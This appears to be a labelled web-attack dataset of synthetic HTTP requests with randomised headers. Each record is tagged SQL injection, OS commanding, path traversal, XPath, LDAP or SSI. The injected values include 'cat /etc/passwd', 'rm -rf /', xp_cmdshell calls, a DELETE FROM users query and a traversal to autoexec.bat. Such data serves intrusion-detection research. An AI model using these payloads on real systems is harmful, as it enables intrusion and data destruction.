Cache-Control: only-if-cached
Client-ip: 74.98.44.206
Cookie: OPrE0Gp7uETf=mhlnktr8wutldeldoy;unurue=7417;i2E9titli7if7=adshome;eLie2Qx=>
Cookie2: $Version="293"
Date: Thu, 10 Nov 05 14:22:44 GMT
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: ay2otsbp=eltj
From: wirtsy@nexe4eht.ch
If-Modified-Since: Wed, 11 Jun 08 01:36:36 CET
If-Unmodified-Since: Sat, 29 Sep 07 22:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: "uyvizx1f_Zj3yIKKqm"
Max-Forwards: 2
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest nc=38EfCcD9
Range: -9141,-5899,4-
Referer: http://www.roofh.com/arhone/otte/cRtAew/etst1/6fnrrdO.js
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 1.1; e4-Ee; rv:3.7.8) Gecko/10025699
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9192x115
Via: ctNae/2.7 www.dner.htm, 0.8 213.187.17.232, 7.2 13.250.70.129
Transfer-Encoding: oeesmh
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49546
Start - Id: 49426
class: XPathInjection
GET /tdzte/i4iurdeOg/rjUhQW/L-J.js?stasthh=lutQH3rr6d1rpeeet&ao3rl=iKO&h7raqni=oaoh%27+or+++++1%3C+nNoieA%2Frg%2Fsdae%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D599%5D++or+++%270zv%27+++%3D+%27&rDdCl=4&td=46589&tesNa9=8&n7.hlsaOuE=ebetweenB%5Cis6%3Dd%29%26ahP3&etthR5=%25Oaex3n HTTP/1.0
Host: www.mnoMet.gov
Connection: ut7o
Accept: audio/*
Accept-Charset: x-mac-hebrew;q=0.4
Accept-Encoding: 
Accept-Language: ee5t-nf0t;q=0.2, 4foucte-et, xe6un-tegshmoi;q=0.5, Ihlsn-iih;q=0.8
Cache-Control: no-store
Client-ip: 176.154.34.70
Cookie: tTovacnc2iv3i=j5U.UB;mwarevu=58;atcnndohsehuh=3338;nh1letvsebre5s=nhun
Cookie2: $Version="722"
Date: Sat, 24 Sep 05 12:16:01 UTC
ETag: "9EJy05E0HvEXhGvYe"
Expect: 8Usetdir
From: lyE3Znu@romta.biz
If-Modified-Since: Mon, 03 Jul 06 19:19:29 CET
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: *
Max-Forwards: 596
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Basic dG5FdDU6c2VmZnRldGE=
Authorization: o3ae hmns=Egpoigcn
Range: -32,-92418
Referer: http://www.cJmealg.biz/eb1c/iwgrtng.bin
TE: chunked
Trailer: Warning
User-Agent: Mozilla/9.4 (X11; U; Open BSD i386 7.1; tj-nd; rv:2.1.4) Gecko/54262139
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5208x110
Via: 3.5 www.f9dr1gse.js
Transfer-Encoding: lmeo3a; allejh=en06Ntn
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49426
Start - Id: 48891
class: XPathInjection
GET /hotede5nlhe/szJHGc_4C/group byfn/esaeawuNefpra/7KJAq_7/trxS5JbOcdDuE3MBjn8/GVjjGILE/rZKpxEkeqcB_TnZrdZm0/eMqir6wb59hGZj.html?3cin0t=02&pt=23%3FlpsgmrejdeleteMga&YSQ6w=0KHmtetitg&nAgdigoEAb=oiusrrjqml&9ehn=973&hoieEomesi=33+++++or+4ido%2Fm0mag%2Fnr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D+++++or++++28%3D HTTP/1.0
Host: www.SAsbr.org:039
Connection: keep-alive
Accept: application/postscript, application/*
Accept-Charset: x-mac-hebrew;q=0.9, iso-8859-9;q=0.5, iso-2022-jp, x-mac-roman, utf-8
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=19414
Client-ip: 230.107.51.66
Cookie: AyfajmodcteE=y9FOyhYeUba1;sjrrk=2;rtre8oiiwrjkn=ha6hprocessing-instructionas2po
Cookie2: $Version="74"
Date: Sun, 19 Nov 06 18:05:55 CET
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Wed, 06 Dec 06 20:49:09 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: *
Max-Forwards: 35
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="ueen"
Authorization: eIkop stra6u=2eeltt
Range: 87-22
Referer: http://www.f3eu.cz/AblM/nVaee/gapnitn/llwss/Szew.mpeg
TE: deflate,chunked;q=0.6,deflate;q=0.3
Trailer: User-Agent
User-Agent: oswruahs (k@yyATSlJ; ltdmo2TE3O)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: aiaoc/6.2 www.wgAaa.js, 5.6 132.104.191.101, 9.0 www.nnsptt.png
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 4777989282549
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48891
Start - Id: 39086
class: LdapInjection
PUT /o6mtidtw/ht/coaahki6bon/rzDfwF/gsaween/ytmeon/n1osrq4DEndq5HSv3NVi/aPbffcxpWE52hI3XrY/h8Eq_62ZLS0.8/wVFMnAv/5MGCrme17sam.nsf? HTTP/1.0
Content-Length: 122
Content-Language: ohpt4,3uri
Content-Encoding: deflate
Content-Location: /zteihn.cfm
Content-MD5: ZXJoOW9lZWRhMmNjZWZEdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Sep 04 21:49:33 CET
Last-Modified: Fri, 17 Jun 05 13:40:33 CET
Host: 78.65.23.221
Connection: keep-alive
Accept: application/rtf, application/rtf;q=0.5, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nrS4cn-jMjeiu;q=0.5, itxa0t-s
Cache-Control: no-transform
Client-ip: 67.50.46.134
Cookie: liPkGcopySx6=01534;anxInnrnteh=706)(&(objectClass=bnl)(|(sn =  ah)(cn=a     J*));soclaiblCrs9fd=ir6Pg@6W;t94Pc=w;rvpTeE6sflb=79;56tYccati0=4498184
Cookie2: $Version="00"
Date: Thu, 31 Jan 08 06:13:33 GMT
ETag: W/"52@7ef08sxYsYsK"
Expect: 100-continue
From: it9nqa@N7ieorpseO.st
If-Modified-Since: Wed, 20 Jan 10 21:17:19 CET
If-Unmodified-Since: Thu, 01 Sep 05 15:51:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Authorization: NTLM ZGx2MW5uYXJvaXB1bnV0c2JzZjB1bkg0bW9uZWFhWXd1
Range: 5646-401977,1107-6680,-60
Referer: /xlth9/rageeb/Jtrmaec/7nogo.cfm
TE: trailers
Trailer: Expect
User-Agent: Mozilla/1.7 (X11; U; Linux i386 9.4; 7w-tr; rv:5.7.5) Gecko/52473723
UA-CPU: PowerPC
UA-OS: FreeBSD
UA-Pixels: 455x2330
Via: nsn7h/1.5 199.166.211.146, a3ntx/8.3 www.sIie3.gif
Transfer-Encoding: compress
Upgrade: M1r2t/2.6, amimlh/2.2
Warning: 684 www.12ndoh.gif "dmNngea" 
X-Forwarded-For: 138.193.124.167
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tjn8edtlrslix=91&Rteecooe=esrcT&amhMcftphtpassXq=cLknyjtc&iksiesemC6=8231289869&jeeemYe1= m hshutdown&cHdieeeln=mJ6V46yLat

End - Id: 39086
Start - Id: 44537
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.0
Host: 100.202.60.244
Connection: close
Accept: audio/*;q=0.8, application/*;q=0.8
Accept-Charset: x-mac-ce, utf-8, windows-874;q=0.4, iso-2022-jp
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Cookie: rtoytmmtipdcs7y=315747;gejswdUnq=nht5;T4eeRowdamMof=698;xmy0allj7=rDaNXi
Date: Thu, 28 Feb 08 18:05:06 UTC
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-None-Match: "KAybswvL.7Fe-AqlS-C@"
If-Range: Sat, 26 Jan 08 19:03:41 UTC
Max-Forwards: 2
Pragma: ska='uiOo13Ni'
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM YUVkMGVuMmVzOXJzM2FwdGNtNHU1RFRjZWhwc3QwdGVldDc=
Referer: /ern1eym/s0qw.php
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: aghsiHoh (eUrgPn; t7ILY@)
Via: FTP/6.7 248.191.227.202, euulu/3.2 www.daoi.shtml
Transfer-Encoding: gzip
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44537
Start - Id: 45922
class: PathTransversal
GET /ahixsr8didseofstT/f5-Dh/3wNo@sfXOtPI9wPjdEX0/hEN/lhJ/hkYBP0shDZNHDoIu/rbooydedc/roe/mjQ7oLU1NXn/tmu4laecmhjtusiiue/iendua0eCDinrthte/eWxmwDljvYuG.dll?bhtpass64V7dW.J=45896&heaEttNd2=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&QVphpsls=5482&0wscut2AoSd=rRP4jgG7NL HTTP/1.1
Host: www.P41enehvn.cz:80
Connection: anh5ono4
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: min-fresh=231
Client-ip: 81.172.25.192
Cookie: psed3eueuardEtn=ide
Cookie2: $Version="3"
Date: Wed, 06 Dec 06 06:38:58 UTC
ETag: W/"mLsp4l@CbIwwgt7c-"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Tue, 28 Dec 04 19:05:37 CET
If-Unmodified-Since: Tue, 12 Feb 08 07:29:37 GMT
If-Match: *
If-None-Match: "nxwBQQXr5Hx9cWa"
If-Range: *
Max-Forwards: 38
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: tnynda pietehr=pT8ilpb
Range: -106180,0973-,3598-
Referer: /ali8bwnh/ItNrc.jpeg
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/3.7 (Windows; U; WinNT 2.1; 12-s5; rv:3.8.3) Gecko/53017772
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 880x5284
Via: 7.7 255.201.100.218, 4.2 www.sustCznI.jpg, HTTP/3.6 51.175.98.43
Transfer-Encoding: Afso; hr3yea=t1jia
Upgrade: dhvol/0.8, Pde/4.9
Warning: 039 www.rwdtitz.jpeg "i8opqaZazoijrn" "Fri, 21 Apr 06 07:33:49 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45922
Start - Id: 35054
class: SqlInjection
GET /tCJ7qFYQn/tuglnnhgRTai9/sNZ9ocHpWx3vpFq/dIP2hKmo93.quit_e2s/uA0nrH9hFz/t9sqRaieiti/lxtet8haerr2o/ettptbn5r/Iitmpteahyhao.png?ig=Hnegeunshn0ls&tJty7ry=ie0Heltia&olDyshasetar=%3Enlike7plr%27autoexec&nrnencf96ee8i=%290fromag&1emmerihneot7=jnlnpbinst%3ErdekallE%3D&lU58viNa=lan&ocso6ia=5hxmlmailat&NYfgpRyN=ei&iex=849851&ro2arsestatlo=exec++xp_cmdshell++++%27%22mtumo%22+++%3E%3E+script.vbs%27&tsS5hd1dApayUr=fPj1b&Eeh61eiyof=lUxTP6Hj&Ob=shp&AR09vqC1D2AS=h&eqalcNLnaheeiie=aqsddssrtprnfee0t HTTP/1.1
Host: www.bike5.it
Connection: close
Accept: image/*;q=0.9, video/quicktime;q=0.0, application/zip;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: identity, deflate, identity, deflate, compress;q=0.8
Accept-Language: *;q=0.3
Cache-Control: us9t=u
Client-ip: 243.80.185.17
Cookie: buab8nIn=elmdmNtt
Cookie2: $Version="16"
Date: Mon, 04 Dec 06 05:28:57 GMT
ETag: "ZgyoVWAHJC7EFCZkV"
Expect: 100-continue
If-Modified-Since: Tue, 18 Jul 06 01:34:39 GMT
If-Unmodified-Since: Mon, 19 Nov 07 19:41:10 GMT
If-Match: "9ZYLA89ve9xKQ.Kx"
If-None-Match: "WkeUE2OF866syH9gqE"
If-Range: Thu, 16 Nov 06 05:57:12 UTC
Max-Forwards: 63
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: PnTt stlaaah0=afAAao6
Authorization: Digest username="rtnn"
Range: -4,7-,2698-
Referer: http://nibiqn.org/jhetd.html
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (X11; U; Open BSD i386 0.7; 20-n3; rv:3.3.9) Gecko/51794563
UA-CPU: StrongARM
UA-OS: Linux
UA-Color: color16
Via: uytu/5.4 www.wgae9.js, 7.1 www.lcgi1oee.jpg
Transfer-Encoding: compress
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 825 www.eezs.png:4813 "dnlyiz8ddawi9eucren" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35054
Start - Id: 42036
class: SqlInjection
GET /tV_FRYrTjGj_7JY8I/sqd8J/a9dmmehsbOdeooiapn/Bc7ylautoexecrxp_Bw/gf2mehfzb3Zt_.mdb?OIRaP=SrOroncgw&AwYHNi=395327&0or1y7ar2nce=%3Dgroup+bys1n+%5Cuoi&trl4=pd&arIia=3sdeim3tiRdritib&T8gc=eiLposition%3Fik5&Eryan=58300566&eOre0wEihisrs=+fveotgur8n&qr=eowchle%27+%29%3BDELETEFROMusersWHEREupper%28username%29+%3Dupper%28++%27admin HTTP/1.1
Host: www.rbaCoaRa.be
Connection: ez3d
Accept: */*;q=0.2
Accept-Charset: x-mac-cyrillic;q=0.7, utf-7, x-mac-icelandic;q=0.8
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.6
Cache-Control: teotp='enuhaTe5'
Client-ip: 86.202.146.12
Cookie: 5rvhqve=51175880;ltullm=030707
Cookie2: $Version="924"
Date: Thu, 30 Aug 07 23:13:00 GMT
ETag: "_N1zf0lhG2wuFUyPI7"
Expect: htuts=nr7wu2he
From: idgece0c@Iierx.org
If-Modified-Since: Mon, 02 Apr 07 05:26:46 UTC
If-Unmodified-Since: Thu, 26 Aug 04 07:40:34 CET
If-Match: "1_Wf5Xo9DxXAFyBysP5"
If-None-Match: "TqRTcFAxyZw-vHYe"
If-Range: Mon, 15 Dec 08 04:20:27 UTC
Max-Forwards: 704
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZWdvZTpuaGY0aG4=
Authorization: Digest nonce
Range: -69
Referer: http://qsyisX.net/rrmwhe/dotmd/7obsu/stess/feiuzeE.ace
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: ieqasht8 (eHKy57; dPwvptoZp; eJDudfxbd4; ezlm@QyyCO; tnjdmFP)
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 422x9399
Via: HTTP/7.7 www.et5oT.gif, FTP/7.3 www.qesqd0.jpeg
Transfer-Encoding: msot; zwt2iob=igOehlSm
Upgrade: 9zntm/8.2, unrd/8.7, iGIo/4.8, tsi6b/1.8
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 128.48.152.130
X-Serial-Number: 3520691491140757
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42036
Start - Id: 35417
class: SqlInjection
GET /@Q3VZAcHWvXeKcnc/cBnullZallM@/lA/SSZ9W9RT3style/8ttai0ajif/akvuPJMdU8zFft/eCyp9wdtuyam/cPQeHIAT94eqMvMzH/hGNf8execz4b8S_V.png?xml0ah5j=kct8S5nt8to&ekstas=uFWPY&rnsPaciiteeinve=21986&il1ltottvtneeO=hWZiKGHGXm&dausvse1al6D=Hdtho&inserttvscriptlib=enhevowieh5&cmdp@Fprocessing-instructionG6Ko=uetp%27++%29%3BDELETEFROMusersWHEREupper%28username%29++%3Dupper%28++++%27admin&Haevhrslsr=passthruo%2Fo0&6yesbnp74y=20673245&7inno-=004008245&mios3eyheagthu=iidhViaeti HTTP/1.0
Host: www.d0tnr7ifAa.gov
Connection: aqtn
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: b3mee-ewidMs;q=0.1, Qnvtomo-rio, qcr-Almd1
Cache-Control: max-age=2521
Client-ip: 67.105.71.5
Cookie: tsie=vGfuTGrq;yas5drtpiLra=msichhjservicesoI;cgLiskHczhs=n ea;-6TZnodeboot.ini-0styleQ=5174637205
Cookie2: $Version="35"
Date: Sun, 01 Apr 07 06:03:59 UTC
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Tue, 06 Mar 07 16:27:55 GMT
If-Unmodified-Since: Sat, 28 Jul 07 22:16:45 CET
If-Match: "S-21pHT6TPzIb-N"
If-None-Match: "kIopZ_T@-PF40pP-e"
If-Range: Tue, 06 Mar 07 23:10:38 UTC
Max-Forwards: 91
MIME-Version: 5.1
Pragma: et=Hiyii65
Proxy-Authorization: Digest username="tdmza"
Authorization: NTLM dWhhd2l1ZXhhN3VoZUNpeWUxbmllcGdhblRybm5hb3RvdXJwaWxTcm50c3Rr
Range: 12-28
Referer: http://lhnaryW.st/egsL5v/HaaSrOiy/n06n.aspx
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 8.5; ns-le; rv:1.6.5) Gecko/46921680
UA-CPU: Sparc
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: FTP/8.5 www.TeDamv.css
Transfer-Encoding: deflate
Upgrade: geD5/1.4, sat/3.0, otQ/7.5, aoiw/6.4
Warning: 606 www.i1cauo.tiff:848 "mpsrhdkhdyian" 
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 281340124
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35417
Start - Id: 36720
class: OsCommanding
GET /q96xkDZ9ENxE6nFF/ovanb2fz1s8axisdec/issOdrduyuaartOhitoo/iCIAQgwgu/eDWIeRk414fp/iT1rgsiG2WPyRZw1/ldqcMxbdL.dll?T13pur@6uIchild=lLG&Uat19ucrbiclabr=t%5CtMqo1&ntoieit8octR=mEMs8PO-HX&telnetOuCl=htpasseboot.ini&eaDdtuuRStqeuId=%60++++rm+++-rf+++%2F+++++%60&yetsfeeci=94743&ohotNczyeik=likeis&7iwnuoeeade=0563176601&esw7edvPCe=6&iiIeuue=+atth HTTP/1.1
Host: 104.117.189.173
Connection: cu7e
Accept: */*
Accept-Charset: euc-jp;q=0.7, us-ascii, iso-8859-8
Accept-Encoding: gzip, deflate, identity, gzip;q=0.0
Accept-Language: ovA-es6ne, cas6-ott;q=0.3, uth-ateaAi, rtdaxrr-a0ot, shI-a;q=0.0
Cache-Control: min-fresh=40
Client-ip: 234.49.182.184
Cookie: -node1HcmdhpassthruA=133548103
Cookie2: $Version="821"
Date: Wed, 04 Jun 08 03:49:35 GMT
ETag: "l9Gy9HkIv8mHHdYDo6E"
Expect: ivhahey
From: uehzS@rs1ylsy5.ch
If-Modified-Since: Wed, 14 Feb 07 01:05:49 UTC
If-Unmodified-Since: Tue, 20 Sep 05 18:09:21 CET
If-Match: "Fg9C7_vul6nIvRq"
If-None-Match: *
If-Range: *
Max-Forwards: 558
MIME-Version: 6.4
Pragma: no-cache
Authorization: Digest uri=/r38t/bngs5.css
Range: 36-238879
Referer: http://stXohm.gov/f9bhyoen/rsc2mhh/iskfbay7/liI5.js
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.0 (X11; U; Open BSD i586 0.6; hs-tj; rv:2.2.0) Gecko/21575844
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 656x0255
Via: HTTP/5.0 196.208.230.20
Transfer-Encoding: nrsTa; atnhdtfa=moo1ilo
X-Forwarded-For: 18.24.168.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36720
Start - Id: 35039
class: SqlInjection
GET /ON6logd0WhazZImo/sVOZMQ0hUKlhc-rZ7/libf-group byUkG/5USUE/m4pJHUk8Unht.8yvI@b4/s3ux.shtml?tDmniaf=fsqn9ie%26&stEezeodmo=%27%3BEXEC++master.dbo.xp_cmdshell+++%27cmd.exe&casnitiesamds=lldd%25%29r&enimelwtecwuo=gsre&wtherkmg=Ipes HTTP/1.0
Host: www.aSt4itRe.cz
Connection: liD8
Accept: video/quicktime
Accept-Charset: shift_jis
Accept-Encoding: 
Accept-Language: a-of1a6rsb;q=0.2
Cache-Control: only-if-cached
Client-ip: 70.74.68.114
Cookie: -StjRnAXMglL=4976008343;ottesegzt=288487;bformHHgbFwNIRbetween=location0&
Date: Wed, 01 Feb 06 23:10:58 GMT
ETag: W/"0@NBRWxhqqgere4xA"
Expect: 100-continue
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Fri, 09 Mar 07 14:39:09 UTC
If-Match: "pqyLo..u@gR_YOMkbEjm"
If-None-Match: *
If-Range: *
Max-Forwards: 124
MIME-Version: 1.5
Pragma: 9a=eeie4
Authorization: Digest uri=/iy6hgdio.css
Range: 032643-
Referer: http://tjone.st/7odyg8to/ttAtehs6.js
TE: trailers
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 9.0; sw-rT; rv:6.5.7) Gecko/86097119
UA-CPU: PowerPC
UA-Color: color8
Via: 6.4 www.nacffhNz.htm:6
Transfer-Encoding: mtiugs; 0nfw8g=serem
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35039
Start - Id: 40637
class: SSI
GET /4izwMhDyw/stOR/emUa-nkCt4fwk/hLOtaVe3gv0iR/Xdiva8Nhomep7/EOlea.html?secnaiaH=ieosntmstydyru&he2tcN=537800&atsieRthba=zivtP&o80nerttf=tehttpE%26&neisInakai=pisee&HoemmTson4evia=mbodyshs&mn=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&7Tj3ZQ=4&LDjJd.ZhavingRTxI=%24noeeg&NnetcatMYuI=R HTTP/1.0
Host: www.ousd.fr
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1255, x-mac-japanese, gb2312, x-mac-chinesetrad, windows-874;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=15
Client-ip: 90.139.110.154
Cookie: nsm6apei8ts=s;sg=e;:linkin6uen;eHE4rU=ogb6;IAOSjiaNJJE=8736817;OzK8rpHlIWi=ee\u(het
Cookie2: $Version="0"
Date: Wed, 15 Jul 09 11:32:48 UTC
ETag: "-s_wqRBhPXwnF0CQ"
Expect: faesi3c
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Wed, 08 Dec 04 21:09:25 UTC
If-Match: *
If-None-Match: "Z538Xak7SIc3lx2yJH"
If-Range: "rpd-W03w7gwULXneB"
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: Basic ZWVjc1c6ZTRzcmVySQ==
Range: 026791-2
Referer: http://www.l2drr3.cz/iliigsi/rtstrhg5/iD6iu/1enT.ace
TE: chunked;q=0.0,trailers,gzip;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (X11; U; Open BSD i586 0.3; Li-ss; rv:0.9.8) Gecko/91596862
UA-CPU: x86
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: 3.4 214.107.15.146, prNiip/7.3 www.FaarjSh.css, FTP/6.8 www.1Eims5.jpeg
Transfer-Encoding: deflate
Upgrade: eeyr/9.4
Warning: 360 www.eyhc6e.gif "hnatYee8" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 9481598521
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40637
Start - Id: 41521
class: SqlInjection
POST /epXyeNy8GdjDI.BJbk@/mlenl0zn/wY0FlDlTuNP2bOAJvwRq/a@Wg1DoT/CoeterebceEthbnr/Lwoantnal/nsn8/aiegii4sESgod/ne9oao/VOiKN55UhSmailservicesLb2/8ztphp/Mt74re9t1e.js? HTTP/1.0
Content-Length: 282
Content-Language: ey
Content-Encoding: deflate
Content-Location: http://tstolsT.gov/Cszsls/8osItNbp/bifj/sgSaa9.php4
Content-MD5: Y2d0cGhub3I5bWlyNnJ1Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.eu6h.gov
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-1255;q=0.7
Accept-Encoding: 
Accept-Language: iihe-xu8k2
Cache-Control: 7ul='i0fSiR'
Client-ip: 1.117.126.196
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="16"
Date: Tue, 29 Jul 08 18:07:51 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sun, 04 May 08 12:24:05 CET
If-Unmodified-Since: Mon, 10 Apr 06 23:38:34 CET
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: "900@CXbT0.sMMvqpxa"
If-Range: *
Max-Forwards: 3535
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: war8dc vont=sei1
Range: -68
Referer: /stqient8.pdf
TE: gzip
Trailer: User-Agent
User-Agent: lk-b2CDx http://www.se35tpdr.biz
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6912x601
Via: 4.6 www.Antsty.shtml, 2.8 174.92.81.0:4457
Transfer-Encoding: iebnb
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

O.@9SWB=8&e95se9EaiRaeeeo=09789775&nkjt3dOCgnt='  OR     'twt3nmtntDa'   <     'X&AeOi=bgsoundWo ifscripteA&vab2tt=bnf&betweenOIdeletevTKkjp=8626101011&ea5orgges=530801&lodanq=700180&LoHVFbc6=loiseiieWhe5&innngnlsrtisoi=2197772867&obxonrnhddniit=60795&sq78anadytd=64032478

End - Id: 41521
Start - Id: 46124
class: PathTransversal
PUT /rK.i9U90Hvuc-cu/bxaakrrsonl/tsINet1zdi/tmVide75P3l7./u8fhZ3LyD_9/psoSNaSRopeipohD/ta_O/tobiaSAttXhni/6u35b.jpeg? HTTP/1.0
Content-Length: 199
Content-Language: i2ridrne,r
Content-Encoding: identity
Content-Location: http://www.eksl2.cz/1tafbd/2omgdndh/a8aEias.wmn
Content-MD5: ZXV0ang4aXJtbm50ZGVSdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 04 Oct 07 03:14:09 GMT
Host: 7.165.250.122
Connection: close
Accept: video/quicktime, audio/*, image/png;q=0.1
Accept-Charset: iso-8859-6, x-mac-chinesesimp, x-mac-turkish;q=0.3
Accept-Encoding: 
Accept-Language: iwEdtt-j;q=0.4, demue-eey;q=0.0, fhp3T-d4, d-fde;q=0.0
Cache-Control: no-cache
Cookie: wArdotlceoUe2=toiat>3aglhs;lfyorrinor=?f)yereo>eznu;FFGmrNBwG_ZU= a;XxHZMpLLap=406646;ujD.Z05=usrjoa
Date: Wed, 20 Jan 10 11:04:21 UTC
